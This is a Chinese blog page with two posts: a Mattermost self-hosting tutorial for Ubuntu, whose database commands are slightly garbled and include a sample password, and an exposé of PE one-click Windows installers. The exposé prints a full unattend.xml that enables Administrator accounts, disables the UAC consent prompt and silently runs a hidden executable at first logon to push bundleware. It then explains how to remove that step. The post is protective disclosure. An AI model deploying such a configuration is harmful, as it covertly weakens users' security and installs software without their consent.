分类: 吐槽天朝

都说有人劈开天地才有人世。劈得清天地,却劈不开人心叵测。

自行搭建 IM Wechat 聊天平台 mattermost 入门配置安装教程

实在无法忍受国内 IM 软件的臃肿,简简单单的聊天搞一堆东西。安装包堪比一个系统。

今天说的这款 IM 支持全平台。WEB 安卓 苹果 PC 都有客户端。名字叫 ”mattermost“。
其实我也试用过其他 IM 。感觉这个比较符合自己的使用习惯。废话不多说,步骤如下:

1,准备一台 Ubuntu 20.04 的实体机或者虚拟机。如果外网使用,最好有公网IP。内网使用不用在乎这些。如果怕被取证,可以使用全盘加密,虚拟机也可以全盘加密。

2,命令行步骤如下:
curl -sL -o- https://deb.packages.mattermost.com/pubkey.gpg | gpg –dearmor | sudo apt-key add
sudo apt-get update
sudo apt install mattermost -y
sudo install -C -m 600 -o mattermost -g mattermost /opt/mattermost/config/config.defaults.json /opt/mattermost/config/config.json
sudo vi /opt/mattermost/config/config.json
# 这里修改配置文件,但现在还无需配置,因为你还没装数据库,我们用推荐的 postgresql 数据库
sudo apt install postgresql postgresql-contrib
sudo su – postgres -c “createuser jacker
sudo su – postgres -c “createdb mattermostdb
sudo -u postgres psql
ALTER USER jack90 WITH PASSWORD ‘edcJacker90‘;
grant all privileges on database mattermostdb to jacker;
\q
# 配置好数据库就可以启动数据库了
sudo systemctl start postgresql
# 接下来再修改 mattermost 的配置文件,主要修改这几处。
定位文件 /opt/mattermost/config/config.json 确认文件内容 DriverName 这一行是 “postgres”
DataSource 这一行是,根据上面数据应该是如下:
“postgres://jacker:edcJacker90@localhost/mattermostdb?sslmode=disable&connect_timeout=10″
“SiteURL” 这一行是
“http://90.life:8065” #如果你没做 nginx 等代理转发,或者其他映射就需要这么设置。如果做了,请转换相应端口。如果加了证书就改为 https。域名请自行替换。这个设置跟你等会在 APP 上写的服务器 url 应该是一致的才对。否则会有错误。
至此所有配置完成。可以使用了。当然配置文件还有许多项目可自行研究。
sudo systemctl start mattermost 启动

这个默认配置只适合小环境使用,如果流量很多,官方推荐使用 nginx 作为前置代理处理流量。此平台一个服务器免费是 200 个名额。其实我就当个跨平台剪切板使用。

更多细节大家可以参考下面连接:
https://docs.mattermost.com/install/install-ubuntu.html


一键装机的秘密 — 隐秘的生意

现在百度搜索 “PE” “优盘”“装机”“一键装机”等都会弹出很多工具。什么老毛桃,深度,番茄花园等就更不用说了。

我试了下,这些确实方便了很多用户。却也藏了很多秘密。

比如我到 I tell you 下载了原版镜像。用这些搜索提到的工具,安装完系统。你会发现多了很多国产软件。而且你卸载后,还会死灰复燃。它自动又装上了。

那么你想知道他是怎么做到的吗?

其实它用到许多 Windows 自动部署的知识。比如这个文件 unattend.xml 。这个文件在系统解压后,你只需要在 Windows目录下新建一个 Pather 的文件夹 ,然后把它放进去,重启进行安装的时候,他会按这个文件的要求自动部署,非常方便。以下是老毛桃 PE 里面自带的工具解压系统映像后生成的。

<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
	<settings pass="specialize">
		<component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
			<RunSynchronous>
				<RunSynchronousCommand wcm:action="add">
					<Order>1</Order>
					<Path>cmd /c net user Administrator /active:yes</Path>
					<Description>EnableAdmin</Description>
				</RunSynchronousCommand>
				<RunSynchronousCommand wcm:action="add">
					<Order>2</Order>
					<Path>cmd /c net user Administrator_ploc /active:yes</Path>
					<Description>EnableAdmin_ploc</Description>
				</RunSynchronousCommand>
				<RunSynchronousCommand wcm:action="add">
					<Order>3</Order>
					<Path>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f</Path>
					<Description>UnConsentPromptBehaviorAdmin</Description>
				</RunSynchronousCommand>
				<RunSynchronousCommand wcm:action="add">
					<Order>4</Order>
					<Path>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 1 /f</Path>
					<Description>FilterAdministratorToken</Description>
				</RunSynchronousCommand>
			</RunSynchronous>
		</component>
	</settings>
	<settings pass="oobeSystem">
		<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
			<OOBE>
				<HideEULAPage>true</HideEULAPage>
				<HideWirelessSetupInOOBE>true</HideWirelessSetupInOOBE>
				<NetworkLocation>Work</NetworkLocation>
				<ProtectYourPC>2</ProtectYourPC>
				<SkipMachineOOBE>true</SkipMachineOOBE>
				<SkipUserOOBE>true</SkipUserOOBE>
			</OOBE>
			<RegisteredOrganization>P R C</RegisteredOrganization>
			<RegisteredOwner>Windows User</RegisteredOwner>
			<FirstLogonCommands>
				<SynchronousCommand wcm:action="add">
					<CommandLine>%WinDir%\Vbjyqqada\Aelmrt.exe</CommandLine>
					<Description>Aelmrt</Description>
					<Order>1</Order>
					<RequiresUserInput>false</RequiresUserInput>
				</SynchronousCommand>
			</FirstLogonCommands>
		</component>
	</settings>
</unattend>

你会发现他在最后有个执行 exe 的指令。这个就是系统安装完后会出现许多国产软件的根源所在。所以你在用它的PE释放系统镜像后,把这个指令删除,并把对应的目录删除即可。

我测试了下,他会安装360全家桶、爱奇艺、黄历、生成一些推广URL。可能还有其他的,我暂未发现。

为什么要这么偷偷摸摸做呢?因为这是一门生意。对用户不太友好的生意。本人也做过推广,每装一台电脑,这些软件联盟会结算推广费。大约每台可以收益五六块。量多的话,不敢想象。

所以还是那个道理。”免费才是最贵的!“

我已经卸载了。那他是怎么死灰复燃的呢?

这个其实是Windows激活造成的。你想啊!国内大部分都是盗版。那他是怎么激活系统的?

目前 Windows 7 一般通过引导激活。也就是模拟oem厂商的slic证书进行激活。

Windows 10 一般是 KMS 激活。KMS 激活就需要一个服务器。那这里可操作的就更多了。

KMS 激活的源代码是开源的。所以他可以编译成任何形式。他甚至可以成为一个肉鸡客户端。所以你会发现,你把恶意软件用杀毒干掉了,但是你电脑的激活也没了,甚至提示你盗版软件的受害者。既然是肉鸡客户端,那么他远程就可以操作你电脑安装任何他想推广的软件。如果这个激活客户端高明的话,一般的杀毒软件根本奈何不了他。

更有甚者,把它编译为EFI的话。他在你系统启动之前就加载了。当然你如果开启安全启动,可能会好很多。但至多也就是证书的问题。如果他的证书也经过了认证,那就真的很难防了。就不说这个,其实很多电脑的安全启动这个选项都是关闭的。

希望大家学会用Windows提供的方式来安装系统。不用那些PE工具了,当然我不是说全部。也有良心的,比如 优启通 。不要百度搜索,那结果都是假的。你要搜的话,搜 IT 天空。他也会修改一些东西,但远没其他PE那么难看。